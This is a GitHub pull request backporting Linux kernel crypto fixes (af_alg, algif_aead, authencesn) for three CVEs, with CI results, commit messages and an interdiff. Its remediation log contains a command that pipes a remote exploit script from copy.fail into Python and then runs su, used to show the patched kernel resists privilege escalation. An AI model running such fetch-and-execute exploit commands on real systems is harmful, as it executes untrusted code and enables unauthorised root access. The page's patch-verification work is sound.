Skip to content

[LTS 9.2] CVE-2026-23060, CVE-2026-31431, CVE-2026-31677 #1167

Merged
roxanan1996 merged 10 commits into
ciqlts9_2from
{jmaple}_ciqlts9_2
May 1, 2026
Merged

[LTS 9.2] CVE-2026-23060, CVE-2026-31431, CVE-2026-31677 #1167
roxanan1996 merged 10 commits into
ciqlts9_2from
{jmaple}_ciqlts9_2

Conversation

@ciq-kernel-automation

@ciq-kernel-automation ciq-kernel-automation Bot commented May 1, 2026

Copy link
Copy Markdown

Sourced from:
#1165

CVE Remediation evidence

(.venv) [jmaple@devbox lts-9.2]$ cat cve.log
Script started on 2026-04-30 23:09:25+00:00 [TERM="xterm-256color" TTY="/dev/pts/0" COLUMNS="274" LINES="67"]
bash-5.1$ sudo dnf install -y python3.11
Last metadata expiration check: 0:21:02 ago on Thu 30 Apr 2026 10:48:34 PM UTC.
Dependencies resolved.
==================================================================================================================================================================================================================================================================================
 Package                                                                        Architecture                                              Version                                                              Repository                                                    Size
==================================================================================================================================================================================================================================================================================
Installing:
 python3.11                                                                     x86_64                                                    3.11.13-5.3.el9_7                                                    appstream                                                     25 k
Installing dependencies:
 libnsl2                                                                        x86_64                                                    2.0.0-1.el9.0.1                                                      appstream                                                     30 k
 mpdecimal                                                                      x86_64                                                    2.5.1-3.el9                                                          appstream                                                     85 k
 python3.11-libs                                                                x86_64                                                    3.11.13-5.3.el9_7                                                    appstream                                                    9.6 M
 python3.11-pip-wheel                                                           noarch                                                    22.3.1-6.el9                                                         appstream                                                    1.4 M
 python3.11-setuptools-wheel                                                    noarch                                                    65.5.1-5.el9                                                         appstream                                                    712 k

Transaction Summary
==================================================================================================================================================================================================================================================================================
Install  6 Packages

Total download size: 12 M
Installed size: 48 M
Downloading Packages:
(1/6): libnsl2-2.0.0-1.el9.0.1.x86_64.rpm                                                                                                                                                                                                         202 kB/s |  30 kB     00:00
(2/6): python3.11-3.11.13-5.3.el9_7.x86_64.rpm                                                                                                                                                                                                    162 kB/s |  25 kB     00:00
(3/6): mpdecimal-2.5.1-3.el9.x86_64.rpm                                                                                                                                                                                                           470 kB/s |  85 kB     00:00
(4/6): python3.11-setuptools-wheel-65.5.1-5.el9.noarch.rpm                                                                                                                                                                                        4.5 MB/s | 712 kB     00:00
(5/6): python3.11-pip-wheel-22.3.1-6.el9.noarch.rpm                                                                                                                                                                                               6.7 MB/s | 1.4 MB     00:00
(6/6): python3.11-libs-3.11.13-5.3.el9_7.x86_64.rpm                                                                                                                                                                                                15 MB/s | 9.6 MB     00:00
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Total                                                                                                                                                                                                                                              13 MB/s |  12 MB     00:00
Running transaction check
Transaction check succeeded.
Running transaction test
Transaction test succeeded.
Running transaction
  Preparing        :                                                                                                                                                                                                                                                          1/1
  Installing       : python3.11-setuptools-wheel-65.5.1-5.el9.noarch                                                                                                                                                                                                          1/6
  Installing       : python3.11-pip-wheel-22.3.1-6.el9.noarch                                                                                                                                                                                                                 2/6
  Installing       : mpdecimal-2.5.1-3.el9.x86_64                                                                                                                                                                                                                             3/6
  Installing       : libnsl2-2.0.0-1.el9.0.1.x86_64                                                                                                                                                                                                                           4/6
  Installing       : python3.11-3.11.13-5.3.el9_7.x86_64                                                                                                                                                                                                                      5/6
  Installing       : python3.11-libs-3.11.13-5.3.el9_7.x86_64                                                                                                                                                                                                                 6/6
  Running scriptlet: python3.11-libs-3.11.13-5.3.el9_7.x86_64                                                                                                                                                                                                                 6/6
  Verifying        : libnsl2-2.0.0-1.el9.0.1.x86_64                                                                                                                                                                                                                           1/6
  Verifying        : mpdecimal-2.5.1-3.el9.x86_64                                                                                                                                                                                                                             2/6
  Verifying        : python3.11-3.11.13-5.3.el9_7.x86_64                                                                                                                                                                                                                      3/6
  Verifying        : python3.11-libs-3.11.13-5.3.el9_7.x86_64                                                                                                                                                                                                                 4/6
  Verifying        : python3.11-pip-wheel-22.3.1-6.el9.noarch                                                                                                                                                                                                                 5/6
  Verifying        : python3.11-setuptools-wheel-65.5.1-5.el9.noarch                                                                                                                                                                                                          6/6

Installed:
  libnsl2-2.0.0-1.el9.0.1.x86_64        mpdecimal-2.5.1-3.el9.x86_64        python3.11-3.11.13-5.3.el9_7.x86_64        python3.11-libs-3.11.13-5.3.el9_7.x86_64        python3.11-pip-wheel-22.3.1-6.el9.noarch        python3.11-setuptools-wheel-65.5.1-5.el9.noarch

Complete!
bash-5.1$ id
uid=1000(jmaple) gid=1000(jmaple) groups=1000(jmaple) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
bash-5.1$ uname -r
5.14.0-jmaple_ciqlts9_2-51da7d5f804b+
bash-5.1$ curl https://copy.fail/exp | python3.11 && su
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   731    0   731    0     0   4597      0 --:--:-- --:--:-- --:--:--  4626
Password: su: Authentication failure
Password:
bash-5.1$ exit
exit

Script done on 2026-04-30 23:10:14+00:00 [COMMAND_EXIT_CODE="130"]

Summary

This PR has been automatically created after successful completion of all CI stages.

Commit Message(s)

crypto: af-alg - fix NULL pointer dereference in scatterwalk

jira VULN-181879
cve-pre CVE-2026-31431
commit-author Norbert Szetei <norbert@doyensec.com>
commit 62397b493e14107ae82d8b80938f293d95425bcb
commit-source centos-stream-9
crypto: algif_aead - Revert to operating out-of-place

jira VULN-181879
cve CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5
commit-source centos-stream-9
crypto: af_alg - limit RX SG extraction by receive buffer budget

jira VULN-182989
cve CVE-2026-31677
commit-author Douya Le <ldy3087146292@gmail.com>
commit 8eceab19eba9dcbfd2a0daec72e1bf48aa100170
commit-source centos-stream-9
crypto: af_alg - Fix page reassignment overflow in af_alg_pull_tsgl

jira VULN-182989
cve-bf CVE-2026-31677
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit 31d00156e50ecad37f2cb6cbf04aaa9a260505ef
commit-source centos-stream-9
crypto: authencesn - reject too-short AAD (assoclen<8) to match ESP/ESN spec

jira VULN-175567
cve CVE-2026-23060
commit-author Taeyang Lee <0wn@theori.io>
commit 2397e9264676be7794f8f7f1e9763d90bd3c7335
commit-source centos-stream-9
crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption

jira VULN-181879
cve CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit e02494114ebf7c8b42777c6cd6982f113bfdbec7
commit-source centos-stream-9
commit-note CentOS attributes this to CVE-2026-31431 but it fixes the
	same code commit as CVE-2026-23060. I defaulted to the centos
	attribution for consistency with our upstream.
crypto: authencesn - Fix src offset when decrypting in-place

jira VULN-181879
cve-bf CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit 1f48ad3b19a9dfc947868edda0bb8e48e5b5a8fa
commit-source centos-stream-9
crypto: authencesn - reject short ahash digests during instance creation

jira VULN-181879
cve-bf CVE-2026-31431
commit-author Yucheng Lu <kanolyc@gmail.com>
commit -
commit-source-sha 5db6ef9847717329f12c5ea8aba7e9f588a980c0
commit-source centos-stream-9, cryptodev
crypto: algif_aead - Fix minimum RX size check for decryption

jira VULN-181879
cve-bf CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit 3d14bd48e3a77091cbce637a12c2ae31b4a1687c
crypto: algif_aead - snapshot IV for async AEAD requests

jira VULN-181879
cve-bf CVE-2026-31431
commit-author Douya Le <ldy3087146292@gmail.com>
commit 5aa58c3a572b3e3b6c786953339f7978b845cc52

Test Results

✅ Build Stage

Architecture Build Time Total Time
x86_64 24m 35s 25m 20s
aarch64 13m 20s 13m 55s

✅ Boot Verification

✅ Kernel Selftests

Architecture Passed Failed Compared Against Status
x86_64 176 22 ciqlts9_2 ✅ No regressions
aarch64 140 28 ciqlts9_2 ✅ No regressions

✅ LTP Results

Architecture Passed Failed Compared Against Status
x86_64 1422 81 ciqlts9_2 ✅ No regressions
aarch64 1409 83 ciqlts9_2 ✅ No regressions

x86_64 newly passing:

  • binfmt_misc01 (PASS)
  • binfmt_misc02 (PASS)
  • cap_bounds (PASS)
  • check_keepcaps01 (PASS)
  • check_keepcaps02 (PASS)
  • check_keepcaps03 (PASS)
  • dio01 (PASS)
  • dio02 (PASS)
  • dio03 (PASS)
  • dio04 (PASS)
  • dio05 (PASS)
  • dio06 (PASS)
  • dio07 (PASS)
  • dio08 (PASS)
  • dio09 (PASS)
  • dio10 (PASS)
  • dio11 (PASS)
  • dio12 (PASS)
  • dio13 (PASS)
  • dio14 (PASS)
  • dio15 (PASS)
  • dio16 (PASS)
  • dio17 (PASS)
  • dio18 (PASS)
  • dio19 (PASS)
  • dio20 (PASS)
  • dio21 (PASS)
  • dio22 (PASS)
  • dio23 (PASS)
  • dio24 (PASS)
  • dio25 (PASS)
  • dio26 (PASS)
  • dio27 (PASS)
  • dio28 (PASS)
  • dio29 (PASS)
  • dio30 (PASS)
  • filecaps (PASS)
  • fs_di (PASS)
  • fs_fill (PASS)
  • fs_inod01 (PASS)
  • fs_perms01 (PASS)
  • fs_racer (PASS)
  • ftest01 (PASS)
  • ftest02 (PASS)
  • ftest03 (PASS)
  • ftest04 (PASS)
  • ftest05 (PASS)
  • ftest06 (PASS)
  • ftest07 (PASS)
  • ftest08 (PASS)
  • gf01 (PASS)
  • gf02 (PASS)
  • gf03 (PASS)
  • gf04 (PASS)
  • gf05 (PASS)
  • gf06 (PASS)
  • gf07 (PASS)
  • gf08 (PASS)
  • gf09 (PASS)
  • gf10 (PASS)
  • gf11 (PASS)
  • gf12 (PASS)
  • gf13 (PASS)
  • gf14 (PASS)
  • gf15 (PASS)
  • gf16 (PASS)
  • gf17 (PASS)
  • gf18 (PASS)
  • gf19 (PASS)
  • gf20 (PASS)
  • gf21 (PASS)
  • gf22 (PASS)
  • gf23 (PASS)
  • gf24 (PASS)
  • gf25 (PASS)
  • gf26 (PASS)
  • gf27 (PASS)
  • gf28 (PASS)
  • gf29 (PASS)
  • gf30 (PASS)
  • inode01 (PASS)
  • inode02 (PASS)
  • iogen01 (PASS)
  • isofs (CONF)
  • lftest01 (PASS)
  • linker01 (PASS)
  • openfile01 (PASS)
  • proc01 (PASS)
  • quota_remount_test01 (CONF)
  • read_all_dev (PASS)
  • read_all_proc (PASS)
  • read_all_sys (PASS)
  • rwtest01 (PASS)
  • rwtest02 (PASS)
  • rwtest03 (PASS)
  • rwtest04 (PASS)
  • rwtest05 (PASS)
  • squashfs01 (CONF)
  • stream01 (PASS)
  • stream02 (PASS)
  • stream03 (PASS)
  • stream04 (PASS)
  • stream05 (PASS)
  • writetest01 (PASS)
    aarch64 newly passing:
  • binfmt_misc01 (PASS)
  • binfmt_misc02 (PASS)
  • cap_bounds (PASS)
  • check_keepcaps01 (PASS)
  • check_keepcaps02 (PASS)
  • check_keepcaps03 (PASS)
  • dio01 (PASS)
  • dio02 (PASS)
  • dio03 (PASS)
  • dio04 (PASS)
  • dio05 (PASS)
  • dio06 (PASS)
  • dio07 (PASS)
  • dio08 (PASS)
  • dio09 (PASS)
  • dio10 (PASS)
  • dio11 (PASS)
  • dio12 (PASS)
  • dio13 (PASS)
  • dio14 (PASS)
  • dio15 (PASS)
  • dio16 (PASS)
  • dio17 (PASS)
  • dio18 (PASS)
  • dio19 (PASS)
  • dio20 (PASS)
  • dio21 (PASS)
  • dio22 (PASS)
  • dio23 (PASS)
  • dio24 (PASS)
  • dio25 (PASS)
  • dio26 (PASS)
  • dio27 (PASS)
  • dio28 (PASS)
  • dio29 (PASS)
  • dio30 (PASS)
  • filecaps (PASS)
  • fs_di (PASS)
  • fs_fill (PASS)
  • fs_inod01 (PASS)
  • fs_perms01 (PASS)
  • fs_perms02 (PASS)
  • fs_perms03 (PASS)
  • fs_perms04 (PASS)
  • fs_perms05 (PASS)
  • fs_perms06 (PASS)
  • fs_perms07 (PASS)
  • fs_perms08 (PASS)
  • fs_perms09 (PASS)
  • fs_perms10 (PASS)
  • fs_perms11 (PASS)
  • fs_perms12 (PASS)
  • fs_perms13 (PASS)
  • fs_perms14 (PASS)
  • fs_perms15 (PASS)
  • fs_perms16 (PASS)
  • fs_perms17 (PASS)
  • fs_perms18 (PASS)
  • fs_racer (PASS)
  • ftest01 (PASS)
  • ftest02 (PASS)
  • ftest03 (PASS)
  • ftest04 (PASS)
  • ftest05 (PASS)
  • ftest06 (PASS)
  • ftest07 (PASS)
  • ftest08 (PASS)
  • gf01 (PASS)
  • gf02 (PASS)
  • gf03 (PASS)
  • gf04 (PASS)
  • gf05 (PASS)
  • gf06 (PASS)
  • gf07 (PASS)
  • gf08 (PASS)
  • gf09 (PASS)
  • gf10 (PASS)
  • gf11 (PASS)
  • gf12 (PASS)
  • gf13 (PASS)
  • gf14 (PASS)
  • gf15 (PASS)
  • gf16 (PASS)
  • gf17 (PASS)
  • gf18 (PASS)
  • gf19 (PASS)
  • gf20 (PASS)
  • gf21 (PASS)
  • gf22 (PASS)
  • gf23 (PASS)
  • gf24 (PASS)
  • gf25 (PASS)
  • gf26 (PASS)
  • gf27 (PASS)
  • gf28 (PASS)
  • gf29 (PASS)
  • gf30 (PASS)
  • inode01 (PASS)
  • inode02 (PASS)
  • iogen01 (PASS)
  • isofs (CONF)
  • lftest01 (PASS)
  • linker01 (PASS)
  • openfile01 (PASS)
  • proc01 (PASS)
  • quota_remount_test01 (CONF)
  • read_all_dev (PASS)
  • read_all_proc (PASS)
  • read_all_sys (PASS)
  • rwtest01 (PASS)
  • rwtest02 (PASS)
  • rwtest03 (PASS)
  • rwtest04 (PASS)
  • rwtest05 (PASS)
  • squashfs01 (CONF)
  • stream01 (PASS)
  • stream02 (PASS)
  • stream03 (PASS)
  • stream04 (PASS)
  • stream05 (PASS)
  • writetest01 (PASS)

🤖 This PR was automatically generated by GitHub Actions
Run ID: 25191448600

Herbert Xu and others added 10 commits April 30, 2026 17:54
jira VULN-181879
cve-pre CVE-2026-31431
commit-author Norbert Szetei <norbert@doyensec.com>
commit 62397b4
commit-source centos-stream-9

The AF_ALG interface fails to unmark the end of a Scatter/Gather List (SGL)
when chaining a new af_alg_tsgl structure. If a sendmsg() fills an SGL
exactly to MAX_SGL_ENTS, the last entry is marked as the end. A subsequent
sendmsg() allocates a new SGL and chains it, but fails to clear the end
marker on the previous SGL's last data entry.

This causes the crypto scatterwalk to hit a premature end, returning NULL
on sg_next() and leading to a kernel panic during dereference.

Fix this by explicitly unmarking the end of the previous SGL when
performing sg_chain() in af_alg_alloc_tsgl().

Fixes: 8ff5909 ("crypto: algif_skcipher - User-space interface for skcipher operations")
	Signed-off-by: Norbert Szetei <norbert@doyensec.com>
	Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
jira VULN-181879
cve CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit a664bf3
commit-source centos-stream-9

This mostly reverts commit 72548b0 except for the copying of
the associated data.

There is no benefit in operating in-place in algif_aead since the
source and destination come from different mappings.  Get rid of
all the complexity added for in-place operation and just copy the
AD directly.

Fixes: 72548b0 ("crypto: algif_aead - copy AAD from src to dst")
    Reported-by: Taeyang Lee <0wn@theori.io>
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
jira VULN-182989
cve CVE-2026-31677
commit-author Douya Le <ldy3087146292@gmail.com>
commit 8eceab1
commit-source centos-stream-9

Make af_alg_get_rsgl() limit each RX scatterlist extraction to the
remaining receive buffer budget.

af_alg_get_rsgl() currently uses af_alg_readable() only as a gate
before extracting data into the RX scatterlist. Limit each extraction
to the remaining af_alg_rcvbuf(sk) budget so that receive-side
accounting matches the amount of data attached to the request.

If skcipher cannot obtain enough RX space for at least one chunk while
more data remains to be processed, reject the recvmsg call instead of
rounding the request length down to zero.

Fixes: e870456 ("crypto: algif_skcipher - overhaul memory management")
    Reported-by: Yifan Wu <yifanwucs@gmail.com>
    Reported-by: Juefei Pu <tomapufckgml@gmail.com>
    Co-developed-by: Yuan Tan <yuantan098@gmail.com>
    Signed-off-by: Yuan Tan <yuantan098@gmail.com>
    Suggested-by: Xin Liu <bird@lzu.edu.cn>
    Signed-off-by: Douya Le <ldy3087146292@gmail.com>
    Signed-off-by: Ren Wei <n05ec@lzu.edu.cn>
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
jira VULN-182989
cve-bf CVE-2026-31677
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit 31d0015
commit-source centos-stream-9

When page reassignment was added to af_alg_pull_tsgl the original
loop wasn't updated so it may try to reassign one more page than
necessary.

Add the check to the reassignment so that this does not happen.

Also update the comment which still refers to the obsolete offset
argument.

    Reported-by: syzbot+d23888375c2737c17ba5@syzkaller.appspotmail.com
Fixes: e870456 ("crypto: algif_skcipher - overhaul memory management")
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>

Signed-off-by: Herbert Xu <herbert.xu@redhat.com>
…SN spec

jira VULN-175567
cve CVE-2026-23060
commit-author Taeyang Lee <0wn@theori.io>
commit 2397e92
commit-source centos-stream-9

authencesn assumes an ESP/ESN-formatted AAD. When assoclen is shorter than
the minimum expected length, crypto_authenc_esn_decrypt() can advance past
the end of the destination scatterlist and trigger a NULL pointer dereference
in scatterwalk_map_and_copy(), leading to a kernel panic (DoS).

Add a minimum AAD length check to fail fast on invalid inputs.

Fixes: 104880a ("crypto: authencesn - Convert to new AEAD interface")
    Reported-By: Taeyang Lee <0wn@theori.io>
    Signed-off-by: Taeyang Lee <0wn@theori.io>
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
…e decryption

jira VULN-181879
cve CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit e024941
commit-source centos-stream-9
commit-note CentOS attributes this to CVE-2026-31431 but it fixes the
	same code commit as CVE-2026-23060. I defaulted to the centos
	attribution for consistency with our upstream.

When decrypting data that is not in-place (src != dst), there is
no need to save the high-order sequence bits in dst as it could
simply be re-copied from the source.

However, the data to be hashed need to be rearranged accordingly.

    Reported-by: Taeyang Lee <0wn@theori.io>
Fixes: 104880a ("crypto: authencesn - Convert to new AEAD interface")
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>

Thanks,

    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
jira VULN-181879
cve-bf CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit 1f48ad3
commit-source centos-stream-9

The src SG list offset wasn't set properly when decrypting in-place,
fix it.

    Reported-by: Wolfgang Walter <linux@stwm.de>
Fixes: e024941 ("crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption")
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
jira VULN-181879
cve-bf CVE-2026-31431
commit-author Yucheng Lu <kanolyc@gmail.com>
commit -
commit-source-sha 5db6ef9
commit-source centos-stream-9, cryptodev

authencesn requires either a zero authsize or an authsize of at least
4 bytes because the ESN encrypt/decrypt paths always move 4 bytes of
high-order sequence number data at the end of the authenticated data.

While crypto_authenc_esn_setauthsize() already rejects explicit
non-zero authsizes in the range 1..3, crypto_authenc_esn_create()
still copied auth->digestsize into inst->alg.maxauthsize without
validating it.  The AEAD core then initialized the tfm's default
authsize from that value.

As a result, selecting an ahash with digest size 1..3, such as
cbcmac(cipher_null), exposed authencesn instances whose default
authsize was invalid even though setauthsize() would have rejected the
same value.  AF_ALG could then trigger the ESN tail handling with a
too-short tag and hit an out-of-bounds access.

Reject authencesn instances whose ahash digest size is in the invalid
non-zero range 1..3 so that no tfm can inherit an unsupported default
authsize.

Fixes: f15f05b ("crypto: ccm - switch to separate cbcmac driver")
    Cc: stable@kernel.org
    Reported-by: Yifan Wu <yifanwucs@gmail.com>
    Reported-by: Juefei Pu <tomapufckgml@gmail.com>
    Co-developed-by: Yuan Tan <yuantan098@gmail.com>
    Signed-off-by: Yuan Tan <yuantan098@gmail.com>
    Suggested-by: Xin Liu <bird@lzu.edu.cn>
    Tested-by: Yuhang Zheng <z1652074432@gmail.com>
    Reviewed-by: Eric Biggers <ebiggers@kernel.org>
    Signed-off-by: Yucheng Lu <kanolyc@gmail.com>
    Signed-off-by: Ren Wei <n05ec@lzu.edu.cn>
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
jira VULN-181879
cve-bf CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit 3d14bd4

The check for the minimum receive buffer size did not take the
tag size into account during decryption.  Fix this by adding the
required extra length.

	Reported-by: syzbot+aa11561819dc42ebbc7c@syzkaller.appspotmail.com
	Reported-by: Daniel Pouzzner <douzzer@mega.nu>
Fixes: d887c52 ("crypto: algif_aead - overhaul memory management")
	Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
(cherry picked from commit 3d14bd4)
	Signed-off-by: Jonathan Maple <jmaple@ciq.com>
jira VULN-181879
cve-bf CVE-2026-31431
commit-author Douya Le <ldy3087146292@gmail.com>
commit 5aa58c3

AF_ALG AEAD AIO requests currently use the socket-wide IV buffer during
request processing.  For async requests, later socket activity can
update that shared state before the original request has fully
completed, which can lead to inconsistent IV handling.

Snapshot the IV into per-request storage when preparing the AEAD
request, so in-flight operations no longer depend on mutable socket
state.

Fixes: d887c52 ("crypto: algif_aead - overhaul memory management")
    Cc: stable@kernel.org
    Reported-by: Yuan Tan <yuantan098@gmail.com>
    Reported-by: Yifan Wu <yifanwucs@gmail.com>
    Reported-by: Juefei Pu <tomapufckgml@gmail.com>
    Reported-by: Xin Liu <bird@lzu.edu.cn>
    Co-developed-by: Luxing Yin <tr0jan@lzu.edu.cn>
    Signed-off-by: Luxing Yin <tr0jan@lzu.edu.cn>
    Tested-by: Yucheng Lu <kanolyc@gmail.com>
    Signed-off-by: Douya Le <ldy3087146292@gmail.com>
    Signed-off-by: Ren Wei <n05ec@lzu.edu.cn>
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
@ciq-kernel-automation ciq-kernel-automation Bot added the created-by-kernelci Tag PRs that were automatically created when a user branch was pushed to the repo (kernelCI) label May 1, 2026
@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

🤖 Validation Checks In Progress Workflow run: https://github.com/ctrliq/kernel-src-tree/actions/runs/25199053980

@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

🔍 Upstream Linux Kernel Commit Check

  • ❌ PR commit 3fed07cbcfc (crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption) references CVE-2026-31431 but
    upstream commit e02494114ebf has no CVE assigned

This is an automated message from the kernel commit checker workflow.

@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

🔍 Interdiff Analysis

  • ⚠️ PR commit d65d925e845 (crypto: algif_aead - Revert to operating out-of-place) → upstream a664bf3d603d
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -207,13 +208,72 @@
 	/* Use the RX SGL as source (and destination) for crypto op. */
 	rsgl_src = areq->first_rsgl.sgl.sg;
 
-	err = crypto_aead_copy_sgl(null_tfm, tsgl_src, rsgl_src,
-				   ctx->aead_assoclen);
-	if (err)
-		goto free;
+	if (ctx->enc) {
+		/*
+		 * Encryption operation - The in-place cipher operation is
+		 * achieved by the following operation:
+		 *
+		 * TX SGL: AAD || PT
+		 *	    |	   |
+		 *	    | copy |
+		 *	    v	   v
+		 * RX SGL: AAD || PT || Tag
+		 */
+		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
+					   areq->first_rsgl.sgl.sg, processed);
+		if (err)
+			goto free;
+		af_alg_pull_tsgl(sk, processed, NULL, 0);
+	} else {
+		/*
+		 * Decryption operation - To achieve an in-place cipher
+		 * operation, the following  SGL structure is used:
+		 *
+		 * TX SGL: AAD || CT || Tag
+		 *	    |	   |	 ^
+		 *	    | copy |	 | Create SGL link.
+		 *	    v	   v	 |
+		 * RX SGL: AAD || CT ----+
+		 */
+
+		 /* Copy AAD || CT to RX SGL buffer for in-place operation. */
+		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
+					   areq->first_rsgl.sgl.sg, outlen);
+		if (err)
+			goto free;
+
+		/* Create TX SGL for tag and chain it to RX SGL. */
+		areq->tsgl_entries = af_alg_count_tsgl(sk, processed,
+						       processed - as);
+		if (!areq->tsgl_entries)
+			areq->tsgl_entries = 1;
+		areq->tsgl = sock_kmalloc(sk, array_size(sizeof(*areq->tsgl),
+							 areq->tsgl_entries),
+					  GFP_KERNEL);
+		if (!areq->tsgl) {
+			err = -ENOMEM;
+			goto free;
+		}
+		sg_init_table(areq->tsgl, areq->tsgl_entries);
+
+		/* Release TX SGL, except for tag data and reassign tag data. */
+		af_alg_pull_tsgl(sk, processed, areq->tsgl, processed - as);
+
+		/* chain the areq TX SGL holding the tag with RX SGL */
+		if (usedpages) {
+			/* RX SGL present */
+			struct af_alg_sgl *sgl_prev = &areq->last_rsgl->sgl;
+
+			sg_unmark_end(sgl_prev->sg + sgl_prev->npages - 1);
+			sg_chain(sgl_prev->sg, sgl_prev->npages + 1,
+				 areq->tsgl);
+		} else
+			/* no RX SGL present (e.g. authentication only) */
+			rsgl_src = areq->tsgl;
+	}
 
 	/* Initialize the crypto operation */
-	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
+	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
 			       areq->first_rsgl.sgl.sg, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -26,7 +26,6 @@
 #include <crypto/internal/aead.h>
 #include <crypto/scatterwalk.h>
 #include <crypto/if_alg.h>
-#include <crypto/skcipher.h>
 #include <linux/init.h>
 #include <linux/list.h>
 #include <linux/kernel.h>
@@ -72,7 +71,7 @@
 	struct alg_sock *pask = alg_sk(psk);
 	struct af_alg_ctx *ctx = ask->private;
 	struct crypto_aead *tfm = pask->private;
-	unsigned int i, as = crypto_aead_authsize(tfm);
+	unsigned int as = crypto_aead_authsize(tfm);
 	struct af_alg_async_req *areq;
 	struct af_alg_tsgl *tsgl, *tmp;
 	struct scatterlist *rsgl_src, *tsgl_src = NULL;
@@ -182,64 +177,7 @@
 	/* Use the RX SGL as source (and destination) for crypto op. */
 	rsgl_src = areq->first_rsgl.sgl.sgt.sgl;
 
-	if (ctx->enc) {
-		/*
-		 * Encryption operation - The in-place cipher operation is
-		 * achieved by the following operation:
-		 *
-		 * TX SGL: AAD || PT
-		 *	    |	   |
-		 *	    | copy |
-		 *	    v	   v
-		 * RX SGL: AAD || PT || Tag
-		 */
-		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src,
-			      processed);
-		af_alg_pull_tsgl(sk, processed, NULL, 0);
-	} else {
-		/*
-		 * Decryption operation - To achieve an in-place cipher
-		 * operation, the following  SGL structure is used:
-		 *
-		 * TX SGL: AAD || CT || Tag
-		 *	    |	   |	 ^
-		 *	    | copy |	 | Create SGL link.
-		 *	    v	   v	 |
-		 * RX SGL: AAD || CT ----+
-		 */
-
-		/* Copy AAD || CT to RX SGL buffer for in-place operation. */
-		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src, outlen);
-
-		/* Create TX SGL for tag and chain it to RX SGL. */
-		areq->tsgl_entries = af_alg_count_tsgl(sk, processed,
-						       processed - as);
-		if (!areq->tsgl_entries)
-			areq->tsgl_entries = 1;
-		areq->tsgl = sock_kmalloc(sk, array_size(sizeof(*areq->tsgl),
-							 areq->tsgl_entries),
-					  GFP_KERNEL);
-		if (!areq->tsgl) {
-			err = -ENOMEM;
-			goto free;
-		}
-		sg_init_table(areq->tsgl, areq->tsgl_entries);
-
-		/* Release TX SGL, except for tag data and reassign tag data. */
-		af_alg_pull_tsgl(sk, processed, areq->tsgl, processed - as);
-
-		/* chain the areq TX SGL holding the tag with RX SGL */
-		if (usedpages) {
-			/* RX SGL present */
-			struct af_alg_sgl *sgl_prev = &areq->last_rsgl->sgl;
-			struct scatterlist *sg = sgl_prev->sgt.sgl;
-
-			sg_unmark_end(sg + sgl_prev->sgt.nents - 1);
-			sg_chain(sg, sgl_prev->sgt.nents + 1, areq->tsgl);
-		} else
-			/* no RX SGL present (e.g. authentication only) */
-			rsgl_src = areq->tsgl;
-	}
+	memcpy_sglist(rsgl_src, tsgl_src, ctx->aead_assoclen);
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
@@ -242,7 +180,7 @@
 	}
 
 	/* Initialize the crypto operation */
-	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
+	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
 			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -28,5 +28,4 @@
 #include <crypto/if_alg.h>
 #include <crypto/skcipher.h>
-#include <crypto/null.h>
 #include <linux/init.h>
 #include <linux/list.h>
@@ -69,6 +69,6 @@
-	struct aead_tfm *aeadc = pask->private;
-	struct crypto_aead *tfm = aeadc->aead;
-	struct crypto_sync_skcipher *null_tfm = aeadc->null_tfm;
